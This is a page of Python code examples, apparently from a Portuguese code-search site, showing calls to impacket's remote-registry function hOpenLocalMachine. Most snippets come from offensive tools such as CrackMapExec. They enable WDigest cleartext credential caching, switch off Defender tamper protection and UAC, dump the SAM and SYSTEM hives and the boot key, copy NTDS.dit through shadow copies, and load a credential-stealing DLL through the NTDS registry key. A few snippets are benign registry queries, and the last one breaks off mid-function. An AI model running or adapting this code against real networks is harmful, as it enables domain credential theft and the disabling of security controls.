Exemplos de hOpenLocalMachine em Python

Exemplo n.º 1

Arquivo: wdigest.py Projeto: dabi0ne/CrackMapExec

    def disable(self):
        remoteOps = RemoteOperations(self.smbconnection, self.doKerb)
        remoteOps.enableRegistry()
        self.rrp = remoteOps._RemoteOperations__rrp

        if self.rrp is not None:
            ans = rrp.hOpenLocalMachine(self.rrp)
            regHandle = ans['phKey']

            ans = rrp.hBaseRegOpenKey(self.rrp, regHandle, 'SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest')
            keyHandle = ans['phkResult']

            try:
                rrp.hBaseRegDeleteValue(self.rrp, keyHandle, 'UseLogonCredential\x00')
            except:
                self.logger.success('UseLogonCredential registry key not present')

                try:
                    remoteOps.finish()
                except:
                    pass

                return

            try:
                #Check to make sure the reg key is actually deleted
                rtype, data = rrp.hBaseRegQueryValue(self.rrp, keyHandle, 'UseLogonCredential\x00')
            except DCERPCException:
                self.logger.success('UseLogonCredential registry key deleted successfully')
                
                try:
                    remoteOps.finish()
                except:
                    pass

Exemplo n.º 2

    def enable(self):
        remoteOps = RemoteOperations(self.smbconnection, self.doKerb)
        remoteOps.enableRegistry()
        self.rrp = remoteOps._RemoteOperations__rrp

        if self.rrp is not None:
            ans = rrp.hOpenLocalMachine(self.rrp)
            regHandle = ans['phKey']

            ans = rrp.hBaseRegOpenKey(
                self.rrp, regHandle,
                'SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest'
            )
            keyHandle = ans['phkResult']

            rrp.hBaseRegSetValue(self.rrp, keyHandle, 'UseLogonCredential\x00',
                                 rrp.REG_DWORD, 1)

            rtype, data = rrp.hBaseRegQueryValue(self.rrp, keyHandle,
                                                 'UseLogonCredential\x00')

            if int(data) == 1:
                self.logger.success(
                    'UseLogonCredential registry key created successfully')

        try:
            remoteOps.finish()
        except:
            pass

Exemplo n.º 3

    def disable(self):
        remoteOps = RemoteOperations(self.smbconnection, self.doKerb)
        remoteOps.enableRegistry()
        self.rrp = remoteOps._RemoteOperations__rrp

        if self.rrp is not None:
            ans = rrp.hOpenLocalMachine(self.rrp)
            regHandle = ans['phKey']

            ans = rrp.hBaseRegOpenKey(
                self.rrp, regHandle,
                'SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest'
            )
            keyHandle = ans['phkResult']

            rrp.hBaseRegDeleteValue(self.rrp, keyHandle,
                                    'UseLogonCredential\x00')

            try:
                #Check to make sure the reg key is actually deleted
                rtype, data = rrp.hBaseRegQueryValue(self.rrp, keyHandle,
                                                     'UseLogonCredential\x00')
            except DCERPCException:
                self.logger.success(
                    'UseLogonCredential registry key deleted successfully')

        try:
            remoteOps.finish()
        except:
            pass

Exemplo n.º 4

Arquivo: secretsdump.py Projeto: NEXUS2345/keimpx

    def get_bootKey(self):
        bootKey = ''
        ans = rrp.hOpenLocalMachine(self.__rrp)
        self.__regHandle = ans['phKey']

        for key in ['JD', 'Skew1', 'GBG', 'Data']:
            logger.debug('Retrieving class info for %s' % key)
            ans = rrp.hBaseRegOpenKey(
                self.__rrp, self.__regHandle,
                'SYSTEM\\CurrentControlSet\\Control\\Lsa\\%s' % key)
            keyHandle = ans['phkResult']
            ans = rrp.hBaseRegQueryInfoKey(self.__rrp, keyHandle)
            bootKey = bootKey + ans['lpClassOut'][:-1]
            rrp.hBaseRegCloseKey(self.__rrp, keyHandle)

        transforms = [8, 5, 4, 2, 11, 9, 13, 3, 0, 6, 1, 12, 14, 10, 15, 7]
        bootKey = bootKey.decode('hex')

        for i in xrange(len(bootKey)):
            self.__bootKey += bootKey[transforms[i]]

        logger.info('Target system bootKey: 0x%s' %
                    self.__bootKey.encode('hex'))

        return self.__bootKey

Exemplo n.º 5

Arquivo: secretsdump.py Projeto: NEXUS2345/keimpx

    def __retrieve_hive(self, hive_name):
        temp_filename = '%s' % ''.join(
            [random.choice(string.letters) for i in range(8)])
        ans = rrp.hOpenLocalMachine(self.__rrp)
        regHandle = ans['phKey']

        try:
            ans = rrp.hBaseRegCreateKey(self.__rrp, regHandle, hive_name)
        except:
            raise registryKey('Cannot open %s hive' % hive_name)

        logger.debug('Saving %s hive to %s' % (hive_name, temp_filename))

        keyHandle = ans['phkResult']
        resp = rrp.hBaseRegSaveKey(self.__rrp, keyHandle, temp_filename)
        rrp.hBaseRegCloseKey(self.__rrp, keyHandle)
        rrp.hBaseRegCloseKey(self.__rrp, regHandle)

        # Open the temporary remote file, so it can be read later
        # remote_fp = RemoteFile(self.smb, ntpath.join('\\', temp_filename), share=DataStore.writable_share)
        remote_fp = RemoteFile(self.smb,
                               ntpath.join('System32', temp_filename),
                               share='ADMIN$')

        return remote_fp

Exemplo n.º 6

Arquivo: wdigest.py Projeto: zyayaa/CrackMapExec

    def wdigest_enable(self, context, smbconnection):
        remoteOps = RemoteOperations(smbconnection, False)
        remoteOps.enableRegistry()

        if remoteOps._RemoteOperations__rrp:
            ans = rrp.hOpenLocalMachine(remoteOps._RemoteOperations__rrp)
            regHandle = ans['phKey']

            ans = rrp.hBaseRegOpenKey(
                remoteOps._RemoteOperations__rrp, regHandle,
                'SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest'
            )
            keyHandle = ans['phkResult']

            rrp.hBaseRegSetValue(remoteOps._RemoteOperations__rrp, keyHandle,
                                 'UseLogonCredential\x00', rrp.REG_DWORD, 1)

            rtype, data = rrp.hBaseRegQueryValue(
                remoteOps._RemoteOperations__rrp, keyHandle,
                'UseLogonCredential\x00')

            if int(data) == 1:
                context.log.success(
                    'UseLogonCredential registry key created successfully')

        try:
            remoteOps.finish()
        except:
            pass

Exemplo n.º 7

Arquivo: reg.py Projeto: timmytr1ll/CrackMapExtreme

    def disableTamper(self, dce):
        #
        try:
            ans = rrp.hOpenLocalMachine(
                dce)  # gets handle for HKEY_LOCAL_MACHINE
            regHandle = ans['phKey']
        except Exception as e:
            logging.debug('Exception thrown when hOpenLocalMachine: %s',
                          str(e))
            return

        try:
            resp = rrp.hBaseRegCreateKey(
                dce, regHandle,
                'SOFTWARE\\Microsoft\\Windows Defender\\Features')
            keyHandle = resp['phkResult']
        except Exception as e:
            logging.debug('Exception thrown when hBaseRegCreateKey: %s',
                          str(e))
            return

        # TamperProtection
        try:
            resp = rrp.hBaseRegSetValue(dce, keyHandle, 'TamperProtection\x00',
                                        rrp.REG_DWORD, 0)
            self.logger.highlight(
                'TamperProtection Key Set! TamperProtection is now off!')
        except Exception as e:
            logging.debug(
                'Exception thrown when hBaseRegSetValue EnableLUA: %s', str(e))
            self.logger.error('Could not set TamperProtection Key')
            pass

Exemplo n.º 8

Arquivo: rdp.py Projeto: zyayaa/CrackMapExec

    def rdp_disable(self, context, smbconnection):
        remoteOps = RemoteOperations(smbconnection, False)
        remoteOps.enableRegistry()

        if remoteOps._RemoteOperations__rrp:
            ans = rrp.hOpenLocalMachine(remoteOps._RemoteOperations__rrp)
            regHandle = ans['phKey']

            ans = rrp.hBaseRegOpenKey(
                remoteOps._RemoteOperations__rrp, regHandle,
                'SYSTEM\\CurrentControlSet\\Control\\Terminal Server')
            keyHandle = ans['phkResult']

            rrp.hBaseRegSetValue(remoteOps._RemoteOperations__rrp, keyHandle,
                                 'fDenyTSConnections\x00', rrp.REG_DWORD, 1)

            rtype, data = rrp.hBaseRegQueryValue(
                remoteOps._RemoteOperations__rrp, keyHandle,
                'fDenyTSConnections\x00')

            if int(data) == 1:
                context.log.success('RDP disabled successfully')

        try:
            remoteOps.finish()
        except:
            pass

Exemplo n.º 9

Arquivo: remote_inject.py Projeto: xy0eor/LogonCredentialsSteal

def start(remoteName, remoteHost, username, password, dllPath):

    winreg_bind = r'ncacn_np:445[\pipe\winreg]'
    hRootKey = None
    subkey = None
    rrpclient = None

    print("[*] Connecting to remote registry")

    try:
        rpctransport = transport.SMBTransport(remoteHost, 445, r'\winreg',
                                              username, password, "", "", "",
                                              "")
    except (Exception) as e:
        print("[x] Error establishing SMB connection: %s" % e)
        return

    try:
        # Set up winreg RPC
        rrpclient = rpctransport.get_dce_rpc()
        rrpclient.connect()
        rrpclient.bind(rrp.MSRPC_UUID_RRP)
    except (Exception) as e:
        print("[x] Error binding to remote registry: %s" % e)
        return

    print("[*] Connection established")
    print(
        "[*] Adding new value to SYSTEM\\CurrentControlSet\\Services\\NTDS\\DirectoryServiceExtPtr"
    )

    try:
        # Add a new registry key
        ans = rrp.hOpenLocalMachine(rrpclient)
        hRootKey = ans['phKey']
        subkey = rrp.hBaseRegOpenKey(
            rrpclient, hRootKey, "SYSTEM\\CurrentControlSet\\Services\\NTDS")
        rrp.hBaseRegSetValue(rrpclient, subkey["phkResult"],
                             "DirectoryServiceExtPt", 1, dllPath)
    except (Exception) as e:
        print("[x] Error communicating with remote registry: %s" % e)
        return

    print("[*] Registry value created, DLL will be loaded from %s" % (dllPath))

    trigger_samr(remoteHost, username, password)

    print("[*] Removing registry entry")

    try:
        rrp.hBaseRegDeleteValue(rrpclient, subkey["phkResult"],
                                "DirectoryServiceExtPt")
    except (Exception) as e:
        print("[x] Error deleting from remote registry: %s" % e)
        return

    print("[*] All done")

Exemplo n.º 10

Arquivo: reg.py Projeto: kirus22/CrackMapExtreme

    def checkUAC(self, dce):
        #
        try:
            ans = rrp.hOpenLocalMachine(dce)
            regHandle = ans['phKey']
        except Exception as e:
            logging.debug('Exception thrown when hOpenLocalMachine: %s',
                          str(e))
            return

        self.logger.highlight('UAC Status:')

        try:
            resp = rrp.hBaseRegOpenKey(
                dce, regHandle,
                'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System'
            )
            keyHandle = resp['phkResult']
        except Exception as e:
            logging.debug('Exception thrown when hBaseRegOpenKey: %s', str(e))
            return

        try:
            dataType, lua_uac_value = rrp.hBaseRegQueryValue(
                dce, keyHandle, 'EnableLUA')
        except Exception as e:
            logging.debug('Exception thrown when hBaseRegQueryValue: %s',
                          str(e))
            self.logger.highlight('     enableLua key does not exist!')
            lua_uac_value = 3
            pass

        try:
            dataType, latfp_uac_value = rrp.hBaseRegQueryValue(
                dce, keyHandle, 'LocalAccountTokenFilterPolicy')
        except Exception as e:
            logging.debug('Exception thrown when hBaseRegQueryValue: %s',
                          str(e))
            self.logger.highlight(
                '     LocalAccountTokenFilterPolicy key does not exist!')
            latfp_uac_value = 3
            pass

        if lua_uac_value == 1:
            #print('enableLua = 1')
            self.logger.highlight('    enableLua = 1')
        elif lua_uac_value == 0:
            #print('enableLua = 0')
            self.logger.highlight('    enableLua = 0')

        if latfp_uac_value == 1:
            #print('enableLua = 1')
            self.logger.highlight('    LocalAccountTokenFilterPolicy = 1')
        elif latfp_uac_value == 0:
            #print('enableLua = 0')
            self.logger.highlight('    LocalAccountTokenFilterPolicy = 0')

Exemplo n.º 11

    def query(self, dce, keyName):
        # Let's strip the root key
        try:
            rootKey = keyName.split('\\')[0]
            subKey = '\\'.join(keyName.split('\\')[1:])
        except Exception:
            raise Exception('Error parsing keyName %s' % keyName)

        if rootKey.upper() == 'HKLM':
            ans = rrp.hOpenLocalMachine(dce)
        elif rootKey.upper() == 'HKU':
            ans = rrp.hOpenCurrentUser(dce)
        elif rootKey.upper() == 'HKCR':
            ans = rrp.hOpenClassesRoot(dce)
        else:
            raise Exception('Invalid root key %s ' % rootKey)

        hRootKey = ans['phKey']

        ans2 = rrp.hBaseRegOpenKey(dce,
                                   hRootKey,
                                   subKey,
                                   samDesired=rrp.MAXIMUM_ALLOWED
                                   | rrp.KEY_ENUMERATE_SUB_KEYS
                                   | rrp.KEY_QUERY_VALUE)

        if self.__options.v:
            print(keyName)
            value = rrp.hBaseRegQueryValue(dce, ans2['phkResult'],
                                           self.__options.v)
            print(
                '\t' + self.__options.v + '\t' +
                self.__regValues.get(value[0], 'KEY_NOT_FOUND') + '\t',
                str(value[1]))
        elif self.__options.ve:
            print(keyName)
            value = rrp.hBaseRegQueryValue(dce, ans2['phkResult'], '')
            print(
                '\t' + '(Default)' + '\t' +
                self.__regValues.get(value[0], 'KEY_NOT_FOUND') + '\t',
                str(value[1]))
        elif self.__options.s:
            self.__print_all_subkeys_and_entries(dce, subKey + '\\',
                                                 ans2['phkResult'], 0)
        else:
            print(keyName)
            self.__print_key_values(dce, ans2['phkResult'])
            i = 0
            while True:
                try:
                    key = rrp.hBaseRegEnumKey(dce, ans2['phkResult'], i)
                    print(keyName + '\\' + key['lpNameOut'][:-1])
                    i += 1
                except Exception:
                    break

Exemplo n.º 12

    def saveNTDS(self):
        logging.info('Searching for NTDS.dit')
        # First of all, let's try to read the target NTDS.dit registry entry
        ans = rrp.hOpenLocalMachine(self.__rrp)
        regHandle = ans['phKey']
        try:
            ans = rrp.hBaseRegOpenKey(self.__rrp, self.__regHandle, 'SYSTEM\\CurrentControlSet\\Services\\NTDS\\Parameters')
            keyHandle = ans['phkResult']
        except:
            # Can't open the registry path, assuming no NTDS on the other end
            return None

        try:
            dataType, dataValue = rrp.hBaseRegQueryValue(self.__rrp, keyHandle, 'DSA Database file')
            ntdsLocation = dataValue[:-1]
            ntdsDrive = ntdsLocation[:2]
        except:
            # Can't open the registry path, assuming no NTDS on the other end
            return None

        rrp.hBaseRegCloseKey(self.__rrp, keyHandle)
        rrp.hBaseRegCloseKey(self.__rrp, regHandle)

        logging.info('Registry says NTDS.dit is at %s. Calling vssadmin to get a copy. This might take some time' % ntdsLocation)
        # Get the list of remote shadows
        shadow, shadowFor = self.__getLastVSS()
        if shadow == '' or (shadow != '' and shadowFor != ntdsDrive):
            # No shadow, create one
            self.__executeRemote('%%COMSPEC%% /C vssadmin create shadow /For=%s' % ntdsDrive)
            shadow, shadowFor = self.__getLastVSS()
            shouldRemove = True
            if shadow == '':
                raise Exception('Could not get a VSS')
        else:
            shouldRemove = False

        # Now copy the ntds.dit to the temp directory
        tmpFileName = ''.join([random.choice(string.letters) for _ in range(8)]) + '.tmp'

        self.__executeRemote('%%COMSPEC%% /C copy %s%s %%SYSTEMROOT%%\\Temp\\%s' % (shadow, ntdsLocation[2:], tmpFileName))

        if shouldRemove is True:
            self.__executeRemote('%%COMSPEC%% /C vssadmin delete shadows /For=%s /Quiet' % ntdsDrive)

        self.__smbConnection.deleteFile('ADMIN$', 'Temp\\__output')

        remoteFileName = RemoteFile(self.__smbConnection, 'Temp\\%s' % tmpFileName)

        return remoteFileName

Exemplo n.º 13

Arquivo: remoteoperations.py Projeto: AnyMaster/CrackMapExec

    def saveNTDS(self):
        logging.info('Searching for NTDS.dit')
        # First of all, let's try to read the target NTDS.dit registry entry
        ans = rrp.hOpenLocalMachine(self.__rrp)
        regHandle = ans['phKey']
        try:
            ans = rrp.hBaseRegOpenKey(self.__rrp, self.__regHandle, 'SYSTEM\\CurrentControlSet\\Services\\NTDS\\Parameters')
            keyHandle = ans['phkResult']
        except:
            # Can't open the registry path, assuming no NTDS on the other end
            return None

        try:
            dataType, dataValue = rrp.hBaseRegQueryValue(self.__rrp, keyHandle, 'DSA Database file')
            ntdsLocation = dataValue[:-1]
            ntdsDrive = ntdsLocation[:2]
        except:
            # Can't open the registry path, assuming no NTDS on the other end
            return None

        rrp.hBaseRegCloseKey(self.__rrp, keyHandle)
        rrp.hBaseRegCloseKey(self.__rrp, regHandle)

        logging.info('Registry says NTDS.dit is at %s. Calling vssadmin to get a copy. This might take some time' % ntdsLocation)
        # Get the list of remote shadows
        shadow, shadowFor = self.__getLastVSS()
        if shadow == '' or (shadow != '' and shadowFor != ntdsDrive):
            # No shadow, create one
            self.__executeRemote('%%COMSPEC%% /C vssadmin create shadow /For=%s' % ntdsDrive)
            shadow, shadowFor = self.__getLastVSS()
            shouldRemove = True
            if shadow == '':
                raise Exception('Could not get a VSS')
        else:
            shouldRemove = False

        # Now copy the ntds.dit to the temp directory
        tmpFileName = ''.join([random.choice(string.letters) for _ in range(8)]) + '.tmp'

        self.__executeRemote('%%COMSPEC%% /C copy %s%s %%SYSTEMROOT%%\\Temp\\%s' % (shadow, ntdsLocation[2:], tmpFileName))

        if shouldRemove is True:
            self.__executeRemote('%%COMSPEC%% /C vssadmin delete shadows /For=%s /Quiet' % ntdsDrive)

        self.__smbConnection.deleteFile('ADMIN$', 'Temp\\__output')

        remoteFileName = RemoteFile(self.__smbConnection, 'Temp\\%s' % tmpFileName)

        return remoteFileName

Exemplo n.º 14

 def __retrieveHive(self, hiveName):
     tmpFileName = ''.join([random.choice(string.letters) for _ in range(8)]) + '.tmp'
     ans = rrp.hOpenLocalMachine(self.__rrp)
     regHandle = ans['phKey']
     try:
         ans = rrp.hBaseRegCreateKey(self.__rrp, regHandle, hiveName)
     except:
         raise Exception("Can't open %s hive" % hiveName)
     keyHandle = ans['phkResult']
     rrp.hBaseRegSaveKey(self.__rrp, keyHandle, tmpFileName)
     rrp.hBaseRegCloseKey(self.__rrp, keyHandle)
     rrp.hBaseRegCloseKey(self.__rrp, regHandle)
     # Now let's open the remote file, so it can be read later
     remoteFileName = RemoteFile(self.__smbConnection, 'SYSTEM32\\'+tmpFileName)
     return remoteFileName

Exemplo n.º 15

Arquivo: remoteoperations.py Projeto: AnyMaster/CrackMapExec

 def __retrieveHive(self, hiveName):
     tmpFileName = ''.join([random.choice(string.letters) for _ in range(8)]) + '.tmp'
     ans = rrp.hOpenLocalMachine(self.__rrp)
     regHandle = ans['phKey']
     try:
         ans = rrp.hBaseRegCreateKey(self.__rrp, regHandle, hiveName)
     except:
         raise Exception("Can't open %s hive" % hiveName)
     keyHandle = ans['phkResult']
     rrp.hBaseRegSaveKey(self.__rrp, keyHandle, tmpFileName)
     rrp.hBaseRegCloseKey(self.__rrp, keyHandle)
     rrp.hBaseRegCloseKey(self.__rrp, regHandle)
     # Now let's open the remote file, so it can be read later
     remoteFileName = RemoteFile(self.__smbConnection, 'SYSTEM32\\'+tmpFileName)
     return remoteFileName

Exemplo n.º 16

Arquivo: reg.py Projeto: zjx-ERROR/impacket

 def __strip_root_key(self, dce, keyName):
     # Let's strip the root key
     try:
         rootKey = keyName.split('\\')[0]
         subKey = '\\'.join(keyName.split('\\')[1:])
     except Exception:
         raise Exception('Error parsing keyName %s' % keyName)
     if rootKey.upper() == 'HKLM':
         ans = rrp.hOpenLocalMachine(dce)
     elif rootKey.upper() == 'HKU':
         ans = rrp.hOpenCurrentUser(dce)
     elif rootKey.upper() == 'HKCR':
         ans = rrp.hOpenClassesRoot(dce)
     else:
         raise Exception('Invalid root key %s ' % rootKey)
     hRootKey = ans['phKey']
     return hRootKey, subKey

Exemplo n.º 17

    def connect(self):
        rpctransport = transport.DCERPCTransportFactory(self.stringBinding)
        if len(self.hashes) > 0:
            lmhash, nthash = self.hashes.split(':')
        else:
            lmhash = ''
            nthash = ''
        if hasattr(rpctransport, 'set_credentials'):
            # This method exists only for selected protocol sequences.
            rpctransport.set_credentials(self.username,self.password, self.domain, lmhash, nthash)
        dce = rpctransport.get_dce_rpc()
        #dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_INTEGRITY)
        dce.connect()
        dce.bind(rrp.MSRPC_UUID_RRP, transfer_syntax = self.ts)
        resp = rrp.hOpenLocalMachine(dce, MAXIMUM_ALLOWED | rrp.KEY_WOW64_32KEY | rrp.KEY_ENUMERATE_SUB_KEYS)

        return dce, rpctransport, resp['phKey']

Exemplo n.º 18

Arquivo: uacdump.py Projeto: OJ/CrackMapExec

    def run(self):
        remoteOps = RemoteOperations(self.smbconnection, self.doKerb)
        remoteOps.enableRegistry()
        ans = rrp.hOpenLocalMachine(remoteOps._RemoteOperations__rrp)
        regHandle = ans['phKey']
        ans = rrp.hBaseRegOpenKey(remoteOps._RemoteOperations__rrp, regHandle, 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System')
        keyHandle = ans['phkResult']
        dataType, uac_value = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, keyHandle, 'EnableLUA')

        print_succ("{} UAC status:".format(self.peer))
        if uac_value == 1:
            print_att('1 - UAC Enabled')
        elif uac_value == 0:
            print_att('0 - UAC Disabled')

        rrp.hBaseRegCloseKey(remoteOps._RemoteOperations__rrp, keyHandle)
        remoteOps.finish()

Exemplo n.º 19

Arquivo: uac.py Projeto: SarahELilley/CrackMapExec

    def enum(self):
        remoteOps = RemoteOperations(self.smbconnection, self.doKerb)
        remoteOps.enableRegistry()
        ans = rrp.hOpenLocalMachine(remoteOps._RemoteOperations__rrp)
        regHandle = ans['phKey']
        ans = rrp.hBaseRegOpenKey(remoteOps._RemoteOperations__rrp, regHandle, 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System')
        keyHandle = ans['phkResult']
        dataType, uac_value = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, keyHandle, 'EnableLUA')

        self.logger.success("Enumerating UAC status")
        if uac_value == 1:
            self.logger.highlight('1 - UAC Enabled')
        elif uac_value == 0:
            self.logger.highlight('0 - UAC Disabled')

        rrp.hBaseRegCloseKey(remoteOps._RemoteOperations__rrp, keyHandle)
        remoteOps.finish()

Exemplo n.º 20

Arquivo: test_rrp.py Projeto: carriercomm/DDoSProject

    def connect(self):
        rpctransport = transport.DCERPCTransportFactory(self.stringBinding)
        if len(self.hashes) > 0:
            lmhash, nthash = self.hashes.split(':')
        else:
            lmhash = ''
            nthash = ''
        if hasattr(rpctransport, 'set_credentials'):
            # This method exists only for selected protocol sequences.
            rpctransport.set_credentials(self.username,self.password, self.domain, lmhash, nthash)
        dce = rpctransport.get_dce_rpc()
        #dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_INTEGRITY)
        dce.connect()
        dce.bind(rrp.MSRPC_UUID_RRP, transfer_syntax = self.ts)
        resp = rrp.hOpenLocalMachine(dce, MAXIMUM_ALLOWED | rrp.KEY_WOW64_32KEY | rrp.KEY_ENUMERATE_SUB_KEYS)

        return dce, rpctransport, resp['phKey']

Exemplo n.º 21

Arquivo: uac.py Projeto: z3v2cicidi/CrackMapExec

    def enum(self):
        remoteOps = RemoteOperations(self.smbconnection, self.doKerb)
        remoteOps.enableRegistry()
        ans = rrp.hOpenLocalMachine(remoteOps._RemoteOperations__rrp)
        regHandle = ans['phKey']
        ans = rrp.hBaseRegOpenKey(remoteOps._RemoteOperations__rrp, regHandle, 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System')
        keyHandle = ans['phkResult']
        dataType, uac_value = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, keyHandle, 'EnableLUA')

        self.logger.success("Enumerating UAC status")
        if uac_value == 1:
            self.logger.highlight('1 - UAC Enabled')
        elif uac_value == 0:
            self.logger.highlight('0 - UAC Disabled')

        rrp.hBaseRegCloseKey(remoteOps._RemoteOperations__rrp, keyHandle)
        remoteOps.finish()

Exemplo n.º 22

Arquivo: uac.py Projeto: zyayaa/CrackMapExec

    def on_admin_login(self, context, connection):
        remoteOps = RemoteOperations(connection.conn, False)
        remoteOps.enableRegistry()

        ans = rrp.hOpenLocalMachine(remoteOps._RemoteOperations__rrp)
        regHandle = ans['phKey']
        ans = rrp.hBaseRegOpenKey(remoteOps._RemoteOperations__rrp, regHandle, 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System')
        keyHandle = ans['phkResult']
        dataType, uac_value = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, keyHandle, 'EnableLUA')

        if uac_value == 1:
            context.log.highlight('UAC Status: 1 (UAC Enabled)')
        elif uac_value == 0:
            context.log.highlight('UAC Status: 0 (UAC Disabled)')

        rrp.hBaseRegCloseKey(remoteOps._RemoteOperations__rrp, keyHandle)
        remoteOps.finish()

Exemplo n.º 23

Arquivo: reg.py Projeto: timmytr1ll/CrackMapExtreme

    def enableUAC(self, dce):
        # this actually disables UAC but the key is enable....
        try:
            ans = rrp.hOpenLocalMachine(dce)
            regHandle = ans['phKey']
        except Exception as e:
            logging.debug('Exception thrown when hOpenLocalMachine: %s',
                          str(e))
            return

        try:
            resp = rrp.hBaseRegCreateKey(
                dce, regHandle,
                'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System'
            )
            keyHandle = resp['phkResult']
        except Exception as e:
            logging.debug('Exception thrown when hBaseRegCreateKey: %s',
                          str(e))
            return

        # EnableLUA
        try:
            resp = rrp.hBaseRegSetValue(dce, keyHandle, 'EnableLUA\x00',
                                        rrp.REG_DWORD, 0)
            self.logger.highlight('EnableLUA Key Set!')
        except Exception as e:
            logging.debug(
                'Exception thrown when hBaseRegSetValue EnableLUA: %s', str(e))
            self.logger.error('Could not set EnableLUA Key')
            pass

        # LocalAccountTokenFilterPolicy
        try:
            resp = rrp.hBaseRegSetValue(dce, keyHandle,
                                        'LocalAccountTokenFilterPolicy\x00',
                                        rrp.REG_DWORD, 1)
            self.logger.highlight('LocalAccountTokenFilterPolicy Key Set!')
        except Exception as e:
            logging.debug(
                'Exception thrown when hBaseRegSetValue LocalAccountTokenFilterPolicy: %s',
                str(e))
            self.logger.error(
                'Could not set LocalAccountTokenFilterPolicy Key')
            return

Exemplo n.º 24

Arquivo: remoteoperations.py Projeto: AnyMaster/CrackMapExec

    def checkNoLMHashPolicy(self):
        logging.debug('Checking NoLMHash Policy')
        ans = rrp.hOpenLocalMachine(self.__rrp)
        self.__regHandle = ans['phKey']

        ans = rrp.hBaseRegOpenKey(self.__rrp, self.__regHandle, 'SYSTEM\\CurrentControlSet\\Control\\Lsa')
        keyHandle = ans['phkResult']
        try:
            dataType, noLMHash = rrp.hBaseRegQueryValue(self.__rrp, keyHandle, 'NoLmHash')
        except:
            noLMHash = 0

        if noLMHash != 1:
            logging.debug('LMHashes are being stored')
            return False

        logging.debug('LMHashes are NOT being stored')
        return True

Exemplo n.º 25

    def checkNoLMHashPolicy(self):
        logging.debug('Checking NoLMHash Policy')
        ans = rrp.hOpenLocalMachine(self.__rrp)
        self.__regHandle = ans['phKey']

        ans = rrp.hBaseRegOpenKey(self.__rrp, self.__regHandle, 'SYSTEM\\CurrentControlSet\\Control\\Lsa')
        keyHandle = ans['phkResult']
        try:
            dataType, noLMHash = rrp.hBaseRegQueryValue(self.__rrp, keyHandle, 'NoLmHash')
        except:
            noLMHash = 0

        if noLMHash != 1:
            logging.debug('LMHashes are being stored')
            return False

        logging.debug('LMHashes are NOT being stored')
        return True

Exemplo n.º 26

Arquivo: reg.py Projeto: byt3bl33d3r/impacket

    def query(self, dce, keyName):
        # Let's strip the root key
        try:
            rootKey = keyName.split('\\')[0]
            subKey = '\\'.join(keyName.split('\\')[1:])
        except Exception:
            raise Exception('Error parsing keyName %s' % keyName)

        if rootKey.upper() == 'HKLM':
            ans = rrp.hOpenLocalMachine(dce)
        elif rootKey.upper() == 'HKU':
            ans = rrp.hOpenCurrentUser(dce)
        elif rootKey.upper() == 'HKCR':
            ans = rrp.hOpenClassesRoot(dce)
        else:
            raise Exception('Invalid root key %s ' % rootKey)

        hRootKey = ans['phKey']

        ans2 = rrp.hBaseRegOpenKey(dce, hRootKey, subKey,
                                   samDesired=rrp.MAXIMUM_ALLOWED | rrp.KEY_ENUMERATE_SUB_KEYS | rrp.KEY_QUERY_VALUE)

        if self.__options.v:
            print keyName
            value = rrp.hBaseRegQueryValue(dce, ans2['phkResult'], self.__options.v)
            print '\t' + self.__options.v + '\t' + self.__regValues.get(value[0], 'KEY_NOT_FOUND') + '\t', str(value[1])
        elif self.__options.ve:
            print keyName
            value = rrp.hBaseRegQueryValue(dce, ans2['phkResult'], '')
            print '\t' + '(Default)' + '\t' + self.__regValues.get(value[0], 'KEY_NOT_FOUND') + '\t', str(value[1])
        elif self.__options.s:
            self.__print_all_subkeys_and_entries(dce, subKey + '\\', ans2['phkResult'], 0)
        else:
            print keyName
            self.__print_key_values(dce, ans2['phkResult'])
            i = 0
            while True:
                try:
                    key = rrp.hBaseRegEnumKey(dce, ans2['phkResult'], i)
                    print keyName + '\\' + key['lpNameOut'][:-1]
                    i += 1
                except Exception:
                    break

Exemplo n.º 27

Arquivo: uacdump.py Projeto: vysecurity/CrackMapExec

    def run(self):
        remoteOps = RemoteOperations(self.smbconnection, self.doKerb)
        remoteOps.enableRegistry()
        ans = rrp.hOpenLocalMachine(remoteOps._RemoteOperations__rrp)
        regHandle = ans['phKey']
        ans = rrp.hBaseRegOpenKey(
            remoteOps._RemoteOperations__rrp, regHandle,
            'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System')
        keyHandle = ans['phkResult']
        dataType, uac_value = rrp.hBaseRegQueryValue(
            remoteOps._RemoteOperations__rrp, keyHandle, 'EnableLUA')

        print_succ("{} UAC status:".format(self.peer))
        if uac_value == 1:
            print_att('1 - UAC Enabled')
        elif uac_value == 0:
            print_att('0 - UAC Disabled')

        rrp.hBaseRegCloseKey(remoteOps._RemoteOperations__rrp, keyHandle)
        remoteOps.finish()

Exemplo n.º 28

    def connect(self):
        if self.rrpStarted is not True:
            dce, rpctransport, scHandle = self.connect_scmr()

            desiredAccess = scmr.SERVICE_START | scmr.SERVICE_STOP | scmr.SERVICE_CHANGE_CONFIG | \
                            scmr.SERVICE_QUERY_CONFIG | scmr.SERVICE_QUERY_STATUS | scmr.SERVICE_ENUMERATE_DEPENDENTS

            resp = scmr.hROpenServiceW(dce, scHandle, 'RemoteRegistry\x00',
                                       desiredAccess)
            resp.dump()
            serviceHandle = resp['lpServiceHandle']

            try:
                resp = scmr.hRStartServiceW(dce, serviceHandle)
            except Exception as e:
                if str(e).find('ERROR_SERVICE_ALREADY_RUNNING') >= 0:
                    pass
                else:
                    raise
            resp = scmr.hRCloseServiceHandle(dce, scHandle)
            self.rrpStarted = True

        rpctransport = transport.DCERPCTransportFactory(self.stringBinding)
        if len(self.hashes) > 0:
            lmhash, nthash = self.hashes.split(':')
        else:
